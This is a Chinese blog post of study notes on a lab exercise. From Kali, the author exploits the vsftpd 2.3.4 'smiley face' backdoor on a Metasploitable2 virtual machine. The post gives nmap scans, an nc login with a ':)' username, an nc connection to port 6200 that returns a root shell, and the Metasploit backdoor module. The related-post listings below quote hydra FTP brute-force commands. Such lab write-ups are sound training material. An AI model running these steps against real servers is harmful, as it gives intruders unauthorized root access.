kali利用ftp端口(21)漏洞攻击Metasploitable2-Linux靶机(笑脸漏洞)

最新推荐文章于 2025-03-19 09:27:01 发布
最新推荐文章于 2025-03-19 09:27:01 发布
阅读量4.8k 收藏 58
点赞数 6
分类专栏: 学习笔记 文章标签: linux 安全 网络 网络安全 网络攻击模型
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_58018041/article/details/130305644
版权

此博客为本人学习笔记,如有错误,还请指正。

#vsftpd源码包含后门漏洞
#思路:开放21端口,并且vsftpd版本号为2.3.4
#原理:在特定版本的vsftpd服务器程序中,被人恶意植入代码,当用户名以“:)”结尾时,服务器就会在6200端口监听,并且能够执行任意代码。

实验环境
攻击机:kali :192.168.111.128
靶机:Metasploitable2-Linux:192.168.111.132

Metasploitable 的用户名和密码均为:msfadmin

实验步骤

一、直接在kali终端利用漏洞

1、先测试kali与靶机的连通性
在这里插入图片描述
在这里插入图片描述
2、在kali 终端下对靶机ip地址进行扫描,查看端口情况,发现21端口是打开的

nmap 192.168.111.132

在这里插入图片描述
3、继续扫描该端口版本,发现是含有笑脸漏洞的vsftpd版本。

nmap -p 21 192.168.111.132 -sV

在这里插入图片描述4、攻击前我们先查看6200端口情况(此时端口是关闭的)

nmap -p 6200 192.168.111.132

在这里插入图片描述
5、连接21端口并通过笑脸漏洞登录

nc 192.168.111.132 21
user 任意用户名(以“:)”结尾即可)
pass 任意密码

在这里插入图片描述
6、重新打开一个终端,查看6200端口情况,发现已经打开

nmap -p 6200 192.168.111.132

在这里插入图片描述7、在控制台连接6200端口,获得shell,输入whoami,发现是root权限(要在6200端口打开的情况下才能连接成功)

nc 192.168.111.132 6200

在这里插入图片描述

二、用msfconsole利用漏洞

1、打开终端,进入msfconsole
在这里插入图片描述
2、利用search命令查找我们需要的漏洞模块vsftpd(笑脸漏洞)

search vsftpd

在这里插入图片描述
3、使用漏洞,输入命令

use exploit/unix/ftp/vsftpd_234_backdoor

或者

use 0

在这里插入图片描述4、查看需要设置的参数
在这里插入图片描述5、只需设置目标主机的IP即可
在这里插入图片描述
6、设置好后便可以开始执行攻击exploit
在这里插入图片描述7、获得靶机shell
在这里插入图片描述在这里插入图片描述

参考链接:https://blog.csdn.net/qq_51650968/article/details/121129326

如有侵权,请联系删除。

Metasploitable2靶机渗透linux系统实操
以自己喜欢的方式过一生
11-07 1531
Metasploitable2靶机渗透linux系统实操
4.1、漏洞利用-FTP漏洞
c10udz的博客
09-04 2439
ftp协议:文件传输协议,使用客户/服务器(C/S)模式,用于Internet上的控制文件的双向传输(上传下载),属于网络传输协议的应用层,使用21端口。nmap --script vuln -p 21 192.168.12.129 //漏洞探测。nmap -p 21 192.168.12.129 //扫描靶机21端口是否开启。攻击机:kali、IP=192.168.12.128。//使用nc登录靶机,密码可为空或任意,大小写皆可。FTP文件传输格式:(1)ASCII(2)二进制。
详细 21端口入侵
02-06
弱口令 21端口入侵
MetaSploit渗透测试2-Metasploitable2-linux
最新发布
2202_75658977的博客
03-19 960
172.17.152.196 登录:msfadmin/msfadmin proot:sudo su root 密码:msfadmin。特定版本的vsftpd服务器程序中,被人恶意植入代码,当用户名以“:)“为结尾,服务器就会在6200端口监听,并且能够执行任意代码。Metasploitable2 它是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常 见漏洞攻击。(3)在Windows使用ssh工具实现对靶机的ssh连接。使用exploit进行攻击攻击成功获取到靶机的权限。
端口漏洞21(FTP)
初岄的博客
10-12 5084
FTP 是 File Transfer Protocol(文件传输协议)的英文简称,而中文简称为“文件传输协议”。用于 Internet 上的控制文件的双向传输。同时,它也是一个应用程序(Application)。基于不同的操作系统有不同的 FTP 应用程序,而所有这些应用程序都遵守同一种协议用以传输文件。在 FTP 的使用当中,用户经常遇到两个概念:“下载”(Download)和 “上传”(Upload)。“下载”文件就是从远程主机拷贝文件至自己的计算机上;
漏洞利用FTP漏洞利用
Myu_wzy的博客
09-23 885
一、实验原理 由于FTP没有禁止匿名用户,所以可以直接使用Anonymous用户直接登录FTP服务器。 二、实验环境 目标主机: Metasploit2虚拟机 192.168.20.143 攻击主机: Kali2虚拟机 192.168.20.133 三、匿名用户登录 扫描目标主机21端口:nmap -p 21 192.168.20.143 使用nc 连接ftp:nc 192.168.20.143 21 #密码可以任意输入 ...
端口渗透——21端口FTP
negnegil的博客
09-15 9265
21端口开启的服务FTP代表文件传输协议,其用于在计算机网络上的客户端和服务器之间传输文件。默认端口21,当共享数据时会被打开。 枚举ftp服务的版本信息 nc -vn <ip> 21 获取FTP证书(如果存在) openssl s_client -connect <ip>:21 -starttls ftp 匿名登录 文件可以被隐藏,所以匿名登录可能看不到文件 ftp <ip> >anonymous >anonymous >ls -a 浏览器连
Python 渗透测试:FTP 文件传输 爆破.(21端口
网络安全领域___专研者.
05-18 1007
文件传输是指在计算机网络中将数据从一个位置传输到另一个位置的过程。文件传输爆破是一种黑客攻击手段,主要针对文件传输系统的漏洞进行暴力破解.
linux 漏洞靶机,【漏洞验证】Metasploitable2靶机漏洞复现
weixin_39796878的博客
05-16 1164
文章目录Metasploitable2靶机漏洞复现1、TWiki 'rev' Parameter Arbitrary Command Execution2、VNC Server 'password' Password3、Ingreslock 后门漏洞4、UnrealIRCd Backdoor(ircd)5、 PHP-CGI Query String Parameter Injection Arbi...
kali linux攻击靶机Metasploitable2实验------vsFTPd手工触发漏洞
边城浪子的博客
07-27 1316
漏洞:vsftpd手工出发漏洞:当进行FTP认证时,如果用户名USER中包含:),那么直接就触发监听6200端口的连接的shell。 靶机Metasploitable2 step1:开启kali linuxMetasploitable2 step2:扫描漏洞 命令:nmap --script vuln 目标ip nmap --script vuln -p 21192.168.5...
metasploitable2 渗透测试靶机 1
m0_73910867的博客
10-11 1903
Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。这个版本的虚拟系统兼容VMware。当虚拟系统启动之后,使用用户名:msfadmin 和密码msfadmin登陆 适用于学习网络安全
windows下FTP匿名登录或弱口令漏洞及服务加固
01-10
漏洞描述 FTP 弱口令或匿名登录漏洞,一般指使用 FTP 的用户启用了匿名登录功能,或系统口令的长度太短、复杂度不够、仅包含数字、或仅包含字母等,容易被黑客攻击,发生恶意文件上传或更严重的入侵行为。 漏洞危害 黑客利用弱口令或匿名登录漏洞直接登录 FTP 服务,上传恶意文件,从而获取系统权限,并可能造成数据泄露。 加固方案 不同 FTP 服务软件可能有不同的防护程序,本修复方案以 Windows server 2008 中自带的 FTP 服务和 Linux 中的vsftpd服务为例,您可参考以下方案对您的 FTP 服务进行安全加固。 重要提示: 请确保您的 FTP 服务软件为官方最新版本。同
kali漏洞扫描
IT技术类博客
03-17 1137
Kali Linux 中扫描目标机器的漏洞时,可以使用多种工具进行不同维度的检测。,可以有效识别目标机器的安全风险。但务必始终遵守网络安全法律法规,仅在授权范围内进行测试。Kali Linux 提供了从基础端口扫描到深度漏洞利用的全套工具链。
利用21端口的思路
jammny
05-30 7379
前言: 21端口主要用于FTP(File Transfer Protocol,文件传输协议)服务,FTP服务主要是为了在两台计算机之间实现文件的上传与下载,一台计算机作为FTP客户端,另一台计算机作为FTP服务器,可以采用匿名(anonymous)登录和授权用户名与密码登录两种方式登录FTP服务器。 1.端口扫描 nmap扫描发现存在21端口ftp服务开放 2.爆破得到该ftp存在弱口令 3.利用用户名、密码连接ftp服务器 OK,从扫描结果了解到时WIN7操作系统,那么查询对.
kali linux攻击Metasploit_linux靶机
m0_51786204的博客
05-24 2986
一、环境准备 物理机:win 11 (需要安装nessuss工具:系统漏洞扫描与分析)虚拟机:kali2021靶机metasploitable3-Linux) 二、实验步骤(蜜罐系统搭建) (一)实验准备 1、查看Ip地址并且联通测试 查看ip地址,并且相互ping通 靶机ip地址:192.168.186.138 Kali地址:192.168.186.133 2、在终端打开nmap 3、扫描目标系统Metasploitable 2的所有TCP端口 ...
FTP-利用FTP后门漏洞
Myu_wzy的博客
09-24 935
一、实验原理 vsftpd手工触发漏洞: 当进行FTP认证时,如果用户名USER中包含" :) ",那么直接就触发监听6200端口的连接的shell 二、实验环境 目标主机:Metasploit2虚拟机 192.168.20.143 攻击主机: Kali2虚拟机 192.168.20.133 三、实验过程 先用nc连接靶机,并在进行FTP认证时,用户名包含" :) " 此时靶机的6200端口已经开启 由于nmap进行自动扫描时,默认不会扫描6200端口,所以需要我们手动扫描6.
FTP漏洞利用
kjssy的博客
08-19 483
参考资料: https://www.cnblogs.com/renhaoblog/p/13065978.html https://www.jianshu.com/p/9498ccf62348hydra -l user -p root ftp://192.168.0.1 -l指定账号是user -p指定账号是root hydra targetIP ftp -L users.txt -P pass.txt -V targetIP是目标服务器的IP地址 ftp 是协议 -L 指定一个帐号字典 -l 指定用户 -P
Python 渗透测试:文件传输爆破( 21端口
网络安全领域___专研者.
05-21 3161
Python 开发学习的意义: (1)学习相关安全工具原理. (2)掌握自定义工具及拓展开发解决实战中无工具或手工麻烦批量化等情况. (3)在二次开发 Bypass,日常任务,批量测试利用等方面均有帮助.
渗透测试实战:Windows靶机FTP与IIS漏洞探索
首先,实验环境设定在一个目标靶机(10.11.1.0/24)和攻击机(Kali Linux,10.11.0.90)的场景下。目标靶机IP为10.11.1.13,攻击利用Nmap工具进行端口扫描,以了解潜在的开放服务。 Nmap的扫描结果显示,该靶机...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

夏蝉不识冬雪

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值